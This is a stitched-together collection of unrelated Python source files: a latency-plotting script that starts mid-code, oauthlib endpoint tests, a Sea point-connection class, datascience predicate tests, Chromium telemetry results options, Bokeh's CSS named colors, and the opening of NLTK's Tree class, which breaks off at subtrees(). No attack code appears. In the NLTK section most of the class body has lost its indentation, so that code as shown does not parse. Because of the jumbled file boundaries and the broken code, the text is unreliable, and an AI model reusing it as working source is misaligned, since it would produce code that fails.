        #for line in open(indir).readlines():
        if line.strip() == "":
            continue
        val = float(line.strip()) / 1000.0
        if val > 0:
            ds.append(val)
        else:
            negs_ignored += 1
    data.append(ds)
print "Ignored %d negative latency values!" % (negs_ignored)
# ---- Plot average / 99th / max latency per setup, plus the analytic
# ---- worst-case bound as a horizontal line.
# NOTE(review): the first figure created here is immediately replaced by
# plt.subplots() and never used.
fig = plt.figure(figsize=(3.33,2.22))
fig, ax = plt.subplots(figsize=(3.33,2.22))
pos = np.array(range(len(data)))+1
plt.plot(pos, [np.mean(x) for x in data], marker='+', label='average',
         lw=1.0, color='g')
plt.plot(pos, [np.percentile(x, 99) for x in data], marker='v',
         label='99\\textsuperscript{th}\%ile',
         lw=1.0, color='y', mfc='none', mec='y', mew=1.0)
plt.scatter(pos, [max(x) for x in data], marker='x',
            label='100\\textsuperscript{th}\%ile',
            lw=1.0, color='r')
worst_case_approximation = worst_case_approx([10], train_length, pkt_size)[0]
wc_line = plt.axhline(worst_case_approximation, ls=':', color='r', lw=1.0)
# Two separate legends: one for the series, one for the bound line.
first_legend = plt.legend(loc='upper left', frameon=False, handletextpad=0.1,
                          borderaxespad=0.05)
plt.gca().add_artist(first_legend)
plt.legend([wc_line], ["latency bound"], frameon=False, loc='upper center',
           borderaxespad=0.05, handletextpad=0.1)
ax.set_xlabel('Throughput factor $f$')
ax.set_ylabel('End-to-end latency [$\mu$s]')
plt.ylim(0, 30.0)
plt.yticks(range(0, 31, 5), [str(x) for x in range(0, 31, 5)])
plt.xlim(0, len(inputdirs) + 1)
# X tick labels: bound divided by each setup's label value.
plt.xticks(range(pos[0], pos[-1] + 1, len(pos) / 5),
           [round(worst_case_approximation / float(labels[i-1]), 1)
            for i in range(pos[0], pos[-1] + 1, len(pos) / 5)])
# Shaded regions and A/B/C markers for the experiment phases.
plt.axvspan(0, 5, facecolor='0.8', alpha=0.5, zorder=0, lw=0.0)
plt.axvspan(20.5, 23, facecolor='0.8', alpha=0.5, zorder=0, lw=0.0)
plt.text(2, 31, "\\textbf{A}", fontsize=12)
plt.text(13, 31, "\\textbf{B}", fontsize=12)
plt.text(21.3, 31, "\\textbf{C}", fontsize=12)
plt.savefig(outname, format="pdf", bbox_inches='tight', pad_inches=0.01)
|
from __future__ import unicode_literals, absolute_import
from mock import MagicMock
from ....unittest import TestCase
from oauthlib.oauth1 import RequestValidator
from oauthlib.oauth1.rfc5849 import errors
from oauthlib.oauth1.rfc5849.endpoints import AuthorizationEndpoint
class ResourceEndpointTest(TestCase):
    # NOTE(review): despite the class name, these tests exercise the
    # AuthorizationEndpoint; consider renaming the class in a follow-up.

    def setUp(self):
        """Build an AuthorizationEndpoint around a permissive mock validator."""
        self.validator = MagicMock(wraps=RequestValidator())
        self.validator.verify_request_token.return_value = True
        self.validator.verify_realms.return_value = True
        self.validator.get_realms.return_value = ['test']
        self.validator.save_verifier = MagicMock()
        self.endpoint = AuthorizationEndpoint(self.validator)
        self.uri = 'https://i.b/authorize?oauth_token=foo'

    def test_get_realms_and_credentials(self):
        realms, credentials = self.endpoint.get_realms_and_credentials(self.uri)
        self.assertEqual(realms, ['test'])

    def test_verify_token(self):
        self.validator.verify_request_token.return_value = False
        self.assertRaises(errors.InvalidClientError,
                          self.endpoint.get_realms_and_credentials, self.uri)
        self.assertRaises(errors.InvalidClientError,
                          self.endpoint.create_authorization_response, self.uri)

    def test_verify_realms(self):
        self.validator.verify_realms.return_value = False
        self.assertRaises(errors.InvalidRequestError,
                          self.endpoint.create_authorization_response,
                          self.uri,
                          realms=['bar'])

    def test_create_authorization_response(self):
        """Redirect-URI clients get a 302 with the verifier in Location."""
        self.validator.get_redirect_uri.return_value = 'https://c.b/cb'
        h, b, s = self.endpoint.create_authorization_response(self.uri)
        self.assertEqual(s, 302)
        self.assertIn('Location', h)
        # BUGFIX: `location` was never assigned (NameError at runtime);
        # read it from the response headers.
        location = h['Location']
        self.assertTrue(location.startswith('https://c.b/cb'))
        self.assertIn('oauth_verifier', location)

    def test_create_authorization_response_oob(self):
        """Out-of-band ('oob') clients get a 200 with the verifier in the body.

        BUGFIX: this method previously reused the name
        test_create_authorization_response, silently shadowing the
        redirect-URI test above so it never ran.
        """
        self.validator.get_redirect_uri.return_value = 'oob'
        h, b, s = self.endpoint.create_authorization_response(self.uri)
        self.assertEqual(s, 200)
        self.assertNotIn('Location', h)
        self.assertIn('oauth_verifier', b)
        self.assertIn('oauth_token', b)
|
import Sea
from Connection import Connection
class ConnectionPoint(Connection):
    """
    Class for point connections.
    """

    def __init__(self, obj, system, components):
        Connection.__init__(self, obj, system, components)
        #obj.Sort = 'Point'

    def updateComponents(self, obj):
        # Intersect the shapes of all attached components; if any of the
        # common geometry contains vertices, the components genuinely touch
        # at a point.
        connections = Sea.actions.connection.ShapeConnection([item.Shape for item in obj.Components])
        commons = connections.commons()
        if any([item.Vertexes for item in commons]):
            """
            There is indeed a point connection.
            """
            # Propagate the component list to the model and rebuild the
            # couplings between them.
            obj.Proxy.model.components = obj.Components
            obj.updateCouplings()
|
import doctest
import pytest
from datascience import predicates
from datascience import *
def test_both():
    """Both f and g."""
    pred = are.above(2) & are.below(4)
    outcomes = [pred(n) for n in range(1, 6)]
    assert outcomes == [False, False, True, False, False]
def test_either():
    """Either f or g."""
    pred = are.above(3) | are.below(2)
    outcomes = [pred(n) for n in range(1, 6)]
    assert outcomes == [True, False, False, True, True]
def test_equal_to():
    """Equal to y."""
    pred = are.equal_to(1)
    outcomes = [pred(n) for n in range(1, 6)]
    assert outcomes == [True, False, False, False, False]
def test_above():
    """Greater than y."""
    pred = are.above(3)
    outcomes = [pred(n) for n in range(1, 6)]
    assert outcomes == [False, False, False, True, True]
def test_below():
    """Not below y (i.e. greater than or equal to y).

    NOTE(review): despite the function name, this exercises
    ``are.not_below`` -- the original docstring ("Less than y.")
    described the opposite predicate.
    """
    p = are.not_below(4)
    ps = [p(x) for x in range(1, 6)]
    assert ps == [False, False, False, True, True]
def test_above_or_equal_to():
    """Greater than or equal to y."""
    pred = are.above_or_equal_to(4)
    outcomes = [pred(n) for n in range(1, 6)]
    assert outcomes == [False, False, False, True, True]
def test_below_or_equal_to():
    """Not below-or-equal-to y (i.e. strictly greater than y).

    NOTE(review): despite the function name, this exercises
    ``are.not_below_or_equal_to`` -- the original docstring ("Less than
    or equal to y.") described the opposite predicate.
    """
    p = are.not_below_or_equal_to(3)
    ps = [p(x) for x in range(1, 6)]
    assert ps == [False, False, False, True, True]
def test_strictly_between():
    """Greater than y and less than z."""
    pred = are.strictly_between(2, 4)
    outcomes = [pred(n) for n in range(1, 6)]
    assert outcomes == [False, False, True, False, False]
def test_between():
    """Greater than or equal to y and less than z."""
    pred = are.between(3, 4)
    outcomes = [pred(n) for n in range(1, 6)]
    assert outcomes == [False, False, True, False, False]
def test_between_or_equal_to():
    """Greater than or equal to y and less than or equal to z."""
    pred = are.between_or_equal_to(3, 3)
    outcomes = [pred(n) for n in range(1, 6)]
    assert outcomes == [False, False, True, False, False]
def test_doctests():
    # Run the doctest examples embedded in the predicates module;
    # NORMALIZE_WHITESPACE keeps formatting differences from failing them.
    results = doctest.testmod(predicates,
                              optionflags=doctest.NORMALIZE_WHITESPACE)
    assert results.failed == 0
|
import optparse
import os
import sys
from telemetry.core import util
from telemetry.results import buildbot_output_formatter
from telemetry.results import chart_json_output_formatter
from telemetry.results import csv_output_formatter
from telemetry.results import csv_pivot_table_output_formatter
from telemetry.results import gtest_progress_reporter
from telemetry.results import html_output_formatter
from telemetry.results import json_output_formatter
from telemetry.results import page_test_results
from telemetry.results import progress_reporter
_OUTPUT_FORMAT_CHOICES = ('html', 'buildbot', 'csv', 'gtest', 'json',
'chartjson', 'csv-pivot-table', 'none')
_OUTPUT_FILENAME_LOOKUP = {
'html': 'results.html',
'csv': 'results.csv',
'json': 'results.json',
'chartjson': 'results-chart.json',
'csv-pivot-table': 'results-pivot-table.csv'
}
def AddResultsOptions(parser):
  """Register the results-related command line options on |parser|.

  Args:
    parser: an optparse.OptionParser (or compatible) instance.
  """
  group = optparse.OptionGroup(parser, 'Results options')
  group.add_option('--chartjson', action='store_true',
                   help='Output Chart JSON. Ignores --output-format.')
  # Note: '%%default' survives the %-formatting below as '%default', which
  # optparse then expands to the option's default value in --help output.
  group.add_option('--output-format', action='append', dest='output_formats',
                   choices=_OUTPUT_FORMAT_CHOICES, default=[],
                   help='Output format. Defaults to "%%default". '
                   'Can be %s.' % ', '.join(_OUTPUT_FORMAT_CHOICES))
  group.add_option('-o', '--output',
                   dest='output_file',
                   default=None,
                   help='Redirects output to a file. Defaults to stdout.')
  group.add_option('--output-dir', default=util.GetBaseDir(),
                   help='Where to save output data after the run.')
  group.add_option('--output-trace-tag',
                   default='',
                   help='Append a tag to the key of each result trace. Use '
                   'with html, buildbot, csv-pivot-table output formats.')
  group.add_option('--reset-results', action='store_true',
                   help='Delete all stored results.')
  group.add_option('--upload-results', action='store_true',
                   help='Upload the results to cloud storage.')
  group.add_option('--upload-bucket', default='internal',
                   choices=['public', 'partner', 'internal'],
                   help='Storage bucket to use for the uploaded results. '
                   'Defaults to internal. Supported values are: '
                   'public, partner, internal')
  group.add_option('--results-label',
                   default=None,
                   help='Optional label to use for the results of a run.')
  # Fix: this is a boolean flag. Without action='store_true', optparse
  # treated it as a string option that consumed the following argument.
  group.add_option('--suppress_gtest_report',
                   action='store_true',
                   default=False,
                   help='Whether to suppress GTest progress report.')
  parser.add_option_group(group)
def ProcessCommandLineArgs(parser, args):
  """Validate and normalize the results-related options on |args|.

  Rejects the deprecated --output flag, expands '~' in --output-dir and
  creates the directory if it does not already exist.

  Args:
    parser: the option parser; used only to report the deprecated flag.
    args: the parsed options object (mutated in place).
  """
  # TODO(ariblue): Delete this flag entirely at some future date, when the
  # existence of such a flag has been long forgotten.
  if args.output_file:
    parser.error('This flag is deprecated. Please use --output-dir instead.')

  # Fix: expand '~' BEFORE creating the directory. The previous order
  # created a literal '~...' directory and then rebound args.output_dir to
  # an expanded path that was never created.
  args.output_dir = os.path.expanduser(args.output_dir)
  try:
    os.makedirs(args.output_dir)
  except OSError:
    # Do nothing if the output directory already exists. Existing files will
    # get overwritten.
    pass
def _GetOutputStream(output_format, output_dir):
  """Return the stream a formatter writes to: stdout for 'buildbot',
  otherwise an 'r+' handle on the canonical results file in |output_dir|."""
  assert output_format in _OUTPUT_FORMAT_CHOICES, 'Must specify a valid format.'
  assert output_format not in ('gtest', 'none'), (
      'Cannot set stream for \'gtest\' or \'none\' output formats.')

  if output_format == 'buildbot':
    return sys.stdout

  assert output_format in _OUTPUT_FILENAME_LOOKUP, (
      'No known filename for the \'%s\' output format' % output_format)
  file_path = os.path.join(output_dir, _OUTPUT_FILENAME_LOOKUP[output_format])
  # Touch the file first: 'r+' (read/update, preserving existing content)
  # fails on a missing file, so make sure one exists.
  open(file_path, 'a').close()
  return open(file_path, 'r+')
def _GetProgressReporter(output_skipped_tests_summary, suppress_gtest_report):
  """Pick a progress reporter: a silent one when gtest reporting is
  suppressed, otherwise a GTest-style reporter writing to stdout."""
  if not suppress_gtest_report:
    return gtest_progress_reporter.GTestProgressReporter(
        sys.stdout, output_skipped_tests_summary=output_skipped_tests_summary)
  return progress_reporter.ProgressReporter()
def CreateResults(benchmark_metadata, options,
                  value_can_be_added_predicate=lambda v: True):
  """Build a PageTestResults wired up with the requested output formatters.

  Args:
    options: Contains the options specified in AddResultsOptions.
  """
  if not options.output_formats:
    options.output_formats = [_OUTPUT_FORMAT_CHOICES[0]]

  formatters = []
  for fmt in options.output_formats:
    # 'none' and 'gtest' contribute no formatter; --chartjson overrides all.
    if fmt == 'none' or fmt == 'gtest' or options.chartjson:
      continue

    stream = _GetOutputStream(fmt, options.output_dir)
    if fmt == 'csv':
      formatters.append(csv_output_formatter.CsvOutputFormatter(stream))
    elif fmt == 'csv-pivot-table':
      formatters.append(
          csv_pivot_table_output_formatter.CsvPivotTableOutputFormatter(
              stream, trace_tag=options.output_trace_tag))
    elif fmt == 'buildbot':
      formatters.append(
          buildbot_output_formatter.BuildbotOutputFormatter(
              stream, trace_tag=options.output_trace_tag))
    elif fmt == 'html':
      # TODO(chrishenry): We show buildbot output so that users can grep
      # through the results easily without needing to open the html
      # file. Another option for this is to output the results directly
      # in gtest-style results (via some sort of progress reporter),
      # as we plan to enable gtest-style output for all output formatters.
      formatters.append(
          buildbot_output_formatter.BuildbotOutputFormatter(
              sys.stdout, trace_tag=options.output_trace_tag))
      formatters.append(html_output_formatter.HtmlOutputFormatter(
          stream, benchmark_metadata, options.reset_results,
          options.upload_results, options.browser_type,
          options.results_label, trace_tag=options.output_trace_tag))
    elif fmt == 'json':
      formatters.append(json_output_formatter.JsonOutputFormatter(
          stream, benchmark_metadata))
    elif fmt == 'chartjson':
      formatters.append(
          chart_json_output_formatter.ChartJsonOutputFormatter(
              stream, benchmark_metadata))
    else:
      # Unreachable in practice: optparse validates --output-format choices.
      raise Exception('Invalid --output-format "%s". Valid choices are: %s'
                      % (fmt, ', '.join(_OUTPUT_FORMAT_CHOICES)))

  # TODO(chrishenry): This is here to not change the output of
  # gtest. Let's try enabling skipped tests summary for gtest test
  # results too (in a separate patch), and see if we break anything.
  skipped_summary = 'gtest' in options.output_formats
  reporter = _GetProgressReporter(skipped_summary,
                                  options.suppress_gtest_report)
  return page_test_results.PageTestResults(
      output_formatters=formatters, progress_reporter=reporter,
      output_dir=options.output_dir,
      value_can_be_added_predicate=value_can_be_added_predicate)
|
''' Provide the standard 147 CSS (X11) named colors.
'''
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
log = logging.getLogger(__name__)
from .util import NamedColor
# The 147 standard CSS (X11) color definitions, in alphabetical order.
# Each module-level name is a NamedColor built from the color's name and
# its (red, green, blue) byte components.
aliceblue = NamedColor("aliceblue", 240, 248, 255)
antiquewhite = NamedColor("antiquewhite", 250, 235, 215)
aqua = NamedColor("aqua", 0, 255, 255)
aquamarine = NamedColor("aquamarine", 127, 255, 212)
azure = NamedColor("azure", 240, 255, 255)
beige = NamedColor("beige", 245, 245, 220)
bisque = NamedColor("bisque", 255, 228, 196)
black = NamedColor("black", 0, 0, 0)
blanchedalmond = NamedColor("blanchedalmond", 255, 235, 205)
blue = NamedColor("blue", 0, 0, 255)
blueviolet = NamedColor("blueviolet", 138, 43, 226)
brown = NamedColor("brown", 165, 42, 42)
burlywood = NamedColor("burlywood", 222, 184, 135)
cadetblue = NamedColor("cadetblue", 95, 158, 160)
chartreuse = NamedColor("chartreuse", 127, 255, 0)
chocolate = NamedColor("chocolate", 210, 105, 30)
coral = NamedColor("coral", 255, 127, 80)
cornflowerblue = NamedColor("cornflowerblue", 100, 149, 237)
cornsilk = NamedColor("cornsilk", 255, 248, 220)
crimson = NamedColor("crimson", 220, 20, 60)
# Note: cyan/aqua and magenta/fuchsia are CSS aliases (identical RGB values),
# as are the gray/grey spelling pairs below.
cyan = NamedColor("cyan", 0, 255, 255)
darkblue = NamedColor("darkblue", 0, 0, 139)
darkcyan = NamedColor("darkcyan", 0, 139, 139)
darkgoldenrod = NamedColor("darkgoldenrod", 184, 134, 11)
darkgray = NamedColor("darkgray", 169, 169, 169)
darkgreen = NamedColor("darkgreen", 0, 100, 0)
darkgrey = NamedColor("darkgrey", 169, 169, 169)
darkkhaki = NamedColor("darkkhaki", 189, 183, 107)
darkmagenta = NamedColor("darkmagenta", 139, 0, 139)
darkolivegreen = NamedColor("darkolivegreen", 85, 107, 47)
darkorange = NamedColor("darkorange", 255, 140, 0)
darkorchid = NamedColor("darkorchid", 153, 50, 204)
darkred = NamedColor("darkred", 139, 0, 0)
darksalmon = NamedColor("darksalmon", 233, 150, 122)
darkseagreen = NamedColor("darkseagreen", 143, 188, 143)
darkslateblue = NamedColor("darkslateblue", 72, 61, 139)
darkslategray = NamedColor("darkslategray", 47, 79, 79)
darkslategrey = NamedColor("darkslategrey", 47, 79, 79)
darkturquoise = NamedColor("darkturquoise", 0, 206, 209)
darkviolet = NamedColor("darkviolet", 148, 0, 211)
deeppink = NamedColor("deeppink", 255, 20, 147)
deepskyblue = NamedColor("deepskyblue", 0, 191, 255)
dimgray = NamedColor("dimgray", 105, 105, 105)
dimgrey = NamedColor("dimgrey", 105, 105, 105)
dodgerblue = NamedColor("dodgerblue", 30, 144, 255)
firebrick = NamedColor("firebrick", 178, 34, 34)
floralwhite = NamedColor("floralwhite", 255, 250, 240)
forestgreen = NamedColor("forestgreen", 34, 139, 34)
fuchsia = NamedColor("fuchsia", 255, 0, 255)
gainsboro = NamedColor("gainsboro", 220, 220, 220)
ghostwhite = NamedColor("ghostwhite", 248, 248, 255)
gold = NamedColor("gold", 255, 215, 0)
goldenrod = NamedColor("goldenrod", 218, 165, 32)
gray = NamedColor("gray", 128, 128, 128)
green = NamedColor("green", 0, 128, 0)
greenyellow = NamedColor("greenyellow", 173, 255, 47)
grey = NamedColor("grey", 128, 128, 128)
honeydew = NamedColor("honeydew", 240, 255, 240)
hotpink = NamedColor("hotpink", 255, 105, 180)
indianred = NamedColor("indianred", 205, 92, 92)
indigo = NamedColor("indigo", 75, 0, 130)
ivory = NamedColor("ivory", 255, 255, 240)
khaki = NamedColor("khaki", 240, 230, 140)
lavender = NamedColor("lavender", 230, 230, 250)
lavenderblush = NamedColor("lavenderblush", 255, 240, 245)
lawngreen = NamedColor("lawngreen", 124, 252, 0)
lemonchiffon = NamedColor("lemonchiffon", 255, 250, 205)
lightblue = NamedColor("lightblue", 173, 216, 230)
lightcoral = NamedColor("lightcoral", 240, 128, 128)
lightcyan = NamedColor("lightcyan", 224, 255, 255)
lightgoldenrodyellow = NamedColor("lightgoldenrodyellow", 250, 250, 210)
lightgray = NamedColor("lightgray", 211, 211, 211)
lightgreen = NamedColor("lightgreen", 144, 238, 144)
lightgrey = NamedColor("lightgrey", 211, 211, 211)
lightpink = NamedColor("lightpink", 255, 182, 193)
lightsalmon = NamedColor("lightsalmon", 255, 160, 122)
lightseagreen = NamedColor("lightseagreen", 32, 178, 170)
lightskyblue = NamedColor("lightskyblue", 135, 206, 250)
lightslategray = NamedColor("lightslategray", 119, 136, 153)
lightslategrey = NamedColor("lightslategrey", 119, 136, 153)
lightsteelblue = NamedColor("lightsteelblue", 176, 196, 222)
lightyellow = NamedColor("lightyellow", 255, 255, 224)
lime = NamedColor("lime", 0, 255, 0)
limegreen = NamedColor("limegreen", 50, 205, 50)
linen = NamedColor("linen", 250, 240, 230)
magenta = NamedColor("magenta", 255, 0, 255)
maroon = NamedColor("maroon", 128, 0, 0)
mediumaquamarine = NamedColor("mediumaquamarine", 102, 205, 170)
mediumblue = NamedColor("mediumblue", 0, 0, 205)
mediumorchid = NamedColor("mediumorchid", 186, 85, 211)
mediumpurple = NamedColor("mediumpurple", 147, 112, 219)
mediumseagreen = NamedColor("mediumseagreen", 60, 179, 113)
mediumslateblue = NamedColor("mediumslateblue", 123, 104, 238)
mediumspringgreen = NamedColor("mediumspringgreen", 0, 250, 154)
mediumturquoise = NamedColor("mediumturquoise", 72, 209, 204)
mediumvioletred = NamedColor("mediumvioletred", 199, 21, 133)
midnightblue = NamedColor("midnightblue", 25, 25, 112)
mintcream = NamedColor("mintcream", 245, 255, 250)
mistyrose = NamedColor("mistyrose", 255, 228, 225)
moccasin = NamedColor("moccasin", 255, 228, 181)
navajowhite = NamedColor("navajowhite", 255, 222, 173)
navy = NamedColor("navy", 0, 0, 128)
oldlace = NamedColor("oldlace", 253, 245, 230)
olive = NamedColor("olive", 128, 128, 0)
olivedrab = NamedColor("olivedrab", 107, 142, 35)
orange = NamedColor("orange", 255, 165, 0)
orangered = NamedColor("orangered", 255, 69, 0)
orchid = NamedColor("orchid", 218, 112, 214)
palegoldenrod = NamedColor("palegoldenrod", 238, 232, 170)
palegreen = NamedColor("palegreen", 152, 251, 152)
paleturquoise = NamedColor("paleturquoise", 175, 238, 238)
palevioletred = NamedColor("palevioletred", 219, 112, 147)
papayawhip = NamedColor("papayawhip", 255, 239, 213)
peachpuff = NamedColor("peachpuff", 255, 218, 185)
peru = NamedColor("peru", 205, 133, 63)
pink = NamedColor("pink", 255, 192, 203)
plum = NamedColor("plum", 221, 160, 221)
powderblue = NamedColor("powderblue", 176, 224, 230)
purple = NamedColor("purple", 128, 0, 128)
red = NamedColor("red", 255, 0, 0)
rosybrown = NamedColor("rosybrown", 188, 143, 143)
royalblue = NamedColor("royalblue", 65, 105, 225)
saddlebrown = NamedColor("saddlebrown", 139, 69, 19)
salmon = NamedColor("salmon", 250, 128, 114)
sandybrown = NamedColor("sandybrown", 244, 164, 96)
seagreen = NamedColor("seagreen", 46, 139, 87)
seashell = NamedColor("seashell", 255, 245, 238)
sienna = NamedColor("sienna", 160, 82, 45)
silver = NamedColor("silver", 192, 192, 192)
skyblue = NamedColor("skyblue", 135, 206, 235)
slateblue = NamedColor("slateblue", 106, 90, 205)
slategray = NamedColor("slategray", 112, 128, 144)
slategrey = NamedColor("slategrey", 112, 128, 144)
snow = NamedColor("snow", 255, 250, 250)
springgreen = NamedColor("springgreen", 0, 255, 127)
steelblue = NamedColor("steelblue", 70, 130, 180)
tan = NamedColor("tan", 210, 180, 140)
teal = NamedColor("teal", 0, 128, 128)
thistle = NamedColor("thistle", 216, 191, 216)
tomato = NamedColor("tomato", 255, 99, 71)
turquoise = NamedColor("turquoise", 64, 224, 208)
violet = NamedColor("violet", 238, 130, 238)
wheat = NamedColor("wheat", 245, 222, 179)
white = NamedColor("white", 255, 255, 255)
whitesmoke = NamedColor("whitesmoke", 245, 245, 245)
yellow = NamedColor("yellow", 255, 255, 0)
yellowgreen = NamedColor("yellowgreen", 154, 205, 50)
# NOTE(review): NamedColor (from .util) appears to record every instance it
# creates in NamedColor.__all__; this module re-exports that registry so the
# public API is exactly the set of colors defined above — verify in .util.
__all__ = NamedColor.__all__
|
"""
Class for representing hierarchical language structures, such as
syntax trees and morphological trees.
"""
from __future__ import print_function, unicode_literals
import re
from nltk.grammar import Production, Nonterminal
from nltk.probability import ProbabilisticMixIn
from nltk.util import slice_bounds
from nltk.compat import string_types, python_2_unicode_compatible, unicode_repr
from nltk.internals import raise_unorderable_types
@python_2_unicode_compatible
class Tree(list):
"""
A Tree represents a hierarchical grouping of leaves and subtrees.
For example, each constituent in a syntax tree is represented by a single Tree.
A tree's children are encoded as a list of leaves and subtrees,
where a leaf is a basic (non-tree) value; and a subtree is a
nested Tree.
>>> from nltk.tree import Tree
>>> print(Tree(1, [2, Tree(3, [4]), 5]))
(1 2 (3 4) 5)
>>> vp = Tree('VP', [Tree('V', ['saw']),
... Tree('NP', ['him'])])
>>> s = Tree('S', [Tree('NP', ['I']), vp])
>>> print(s)
(S (NP I) (VP (V saw) (NP him)))
>>> print(s[1])
(VP (V saw) (NP him))
>>> print(s[1,1])
(NP him)
>>> t = Tree.fromstring("(S (NP I) (VP (V saw) (NP him)))")
>>> s == t
True
>>> t[1][1].set_label('X')
>>> t[1][1].label()
'X'
>>> print(t)
(S (NP I) (VP (V saw) (X him)))
>>> t[0], t[1,1] = t[1,1], t[0]
>>> print(t)
(S (X him) (VP (V saw) (NP I)))
The length of a tree is the number of children it has.
>>> len(t)
2
The set_label() and label() methods allow individual constituents
to be labeled. For example, syntax trees use this label to specify
phrase tags, such as "NP" and "VP".
Several Tree methods use "tree positions" to specify
children or descendants of a tree. Tree positions are defined as
follows:
- The tree position *i* specifies a Tree's *i*\ th child.
- The tree position ``()`` specifies the Tree itself.
- If *p* is the tree position of descendant *d*, then
*p+i* specifies the *i*\ th child of *d*.
I.e., every tree position is either a single index *i*,
specifying ``tree[i]``; or a sequence *i1, i2, ..., iN*,
specifying ``tree[i1][i2]...[iN]``.
Construct a new tree. This constructor can be called in one
of two ways:
- ``Tree(label, children)`` constructs a new tree with the
specified label and list of children.
- ``Tree.fromstring(s)`` constructs a new tree by parsing the string ``s``.
"""
def __init__(self, node, children=None):
if children is None:
raise TypeError("%s: Expected a node value and child list "
% type(self).__name__)
elif isinstance(children, string_types):
raise TypeError("%s() argument 2 should be a list, not a "
"string" % type(self).__name__)
else:
list.__init__(self, children)
self._label = node
#////////////////////////////////////////////////////////////
# Comparison operators
#////////////////////////////////////////////////////////////
def __eq__(self, other):
return (self.__class__ is other.__class__ and
(self._label, list(self)) == (other._label, list(other)))
def __lt__(self, other):
if not isinstance(other, Tree):
# raise_unorderable_types("<", self, other)
# Sometimes children can be pure strings,
# so we need to be able to compare with non-trees:
return self.__class__.__name__ < other.__class__.__name__
elif self.__class__ is other.__class__:
return (self._label, list(self)) < (other._label, list(other))
else:
return self.__class__.__name__ < other.__class__.__name__
# @total_ordering doesn't work here, since the class inherits from a builtin class
__ne__ = lambda self, other: not self == other
__gt__ = lambda self, other: not (self < other or self == other)
__le__ = lambda self, other: self < other or self == other
__ge__ = lambda self, other: not self < other
#////////////////////////////////////////////////////////////
# Disabled list operations
#////////////////////////////////////////////////////////////
    def __mul__(self, v):
        """Disabled list operation: ``tree * n`` makes no sense for trees."""
        raise TypeError('Tree does not support multiplication')
    def __rmul__(self, v):
        """Disabled list operation: ``n * tree`` makes no sense for trees."""
        raise TypeError('Tree does not support multiplication')
    def __add__(self, v):
        """Disabled list operation: concatenating trees is not meaningful."""
        raise TypeError('Tree does not support addition')
    def __radd__(self, v):
        """Disabled list operation: concatenating trees is not meaningful."""
        raise TypeError('Tree does not support addition')
#////////////////////////////////////////////////////////////
# Indexing (with support for tree positions)
#////////////////////////////////////////////////////////////
def __getitem__(self, index):
if isinstance(index, (int, slice)):
return list.__getitem__(self, index)
elif isinstance(index, (list, tuple)):
if len(index) == 0:
return self
elif len(index) == 1:
return self[index[0]]
else:
return self[index[0]][index[1:]]
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
def __setitem__(self, index, value):
if isinstance(index, (int, slice)):
return list.__setitem__(self, index, value)
elif isinstance(index, (list, tuple)):
if len(index) == 0:
raise IndexError('The tree position () may not be '
'assigned to.')
elif len(index) == 1:
self[index[0]] = value
else:
self[index[0]][index[1:]] = value
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
def __delitem__(self, index):
if isinstance(index, (int, slice)):
return list.__delitem__(self, index)
elif isinstance(index, (list, tuple)):
if len(index) == 0:
raise IndexError('The tree position () may not be deleted.')
elif len(index) == 1:
del self[index[0]]
else:
del self[index[0]][index[1:]]
else:
raise TypeError("%s indices must be integers, not %s" %
(type(self).__name__, type(index).__name__))
#////////////////////////////////////////////////////////////
# Basic tree operations
#////////////////////////////////////////////////////////////
    # Backwards-compatibility shims for the removed ``node`` attribute: both
    # accessors fail loudly, steering callers to label()/set_label().
    def _get_node(self):
        """Outdated method to access the node value; use the label() method instead."""
        raise NotImplementedError("Use label() to access a node label.")
    def _set_node(self, value):
        """Outdated method to set the node value; use the set_label() method instead."""
        raise NotImplementedError("Use set_label() method to set a node label.")
    node = property(_get_node, _set_node)
def label(self):
"""
Return the node label of the tree.
>>> t = Tree.fromstring('(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))')
>>> t.label()
'S'
:return: the node label (typically a string)
:rtype: any
"""
return self._label
def set_label(self, label):
"""
Set the node label of the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.set_label("T")
>>> print(t)
(T (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))
:param label: the node label (typically a string)
:type label: any
"""
self._label = label
def leaves(self):
"""
Return the leaves of the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.leaves()
['the', 'dog', 'chased', 'the', 'cat']
:return: a list containing this tree's leaves.
The order reflects the order of the
leaves in the tree's hierarchical structure.
:rtype: list
"""
leaves = []
for child in self:
if isinstance(child, Tree):
leaves.extend(child.leaves())
else:
leaves.append(child)
return leaves
def flatten(self):
"""
Return a flat version of the tree, with all non-root non-terminals removed.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> print(t.flatten())
(S the dog chased the cat)
:return: a tree consisting of this tree's root connected directly to
its leaves, omitting all intervening non-terminal nodes.
:rtype: Tree
"""
return Tree(self.label(), self.leaves())
def height(self):
"""
Return the height of the tree.
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.height()
5
>>> print(t[0,0])
(D the)
>>> t[0,0].height()
2
:return: The height of this tree. The height of a tree
containing no children is 1; the height of a tree
containing only leaves is 2; and the height of any other
tree is one plus the maximum of its children's
heights.
:rtype: int
"""
max_child_height = 0
for child in self:
if isinstance(child, Tree):
max_child_height = max(max_child_height, child.height())
else:
max_child_height = max(max_child_height, 1)
return 1 + max_child_height
def treepositions(self, order='preorder'):
"""
>>> t = Tree.fromstring("(S (NP (D the) (N dog)) (VP (V chased) (NP (D the) (N cat))))")
>>> t.treepositions() # doctest: +ELLIPSIS
[(), (0,), (0, 0), (0, 0, 0), (0, 1), (0, 1, 0), (1,), (1, 0), (1, 0, 0), ...]
>>> for pos in t.treepositions('leaves'):
... t[pos] = t[pos][::-1].upper()
>>> print(t)
(S (NP (D EHT) (N GOD)) (VP (V DESAHC) (NP (D EHT) (N TAC))))
:param order: One of: ``preorder``, ``postorder``, ``bothorder``,
``leaves``.
"""
positions = []
if order in ('preorder', 'bothorder'): positions.append( () )
for i, child in enumerate(self):
if isinstance(child, Tree):
childpos = child.treepositions(order)
positions.extend((i,)+p for p in childpos)
else:
positions.append( (i,) )
if order in ('postorder', 'bothorder'): positions.append( () )
return positions
def subtrees(self, filter=None):
"""
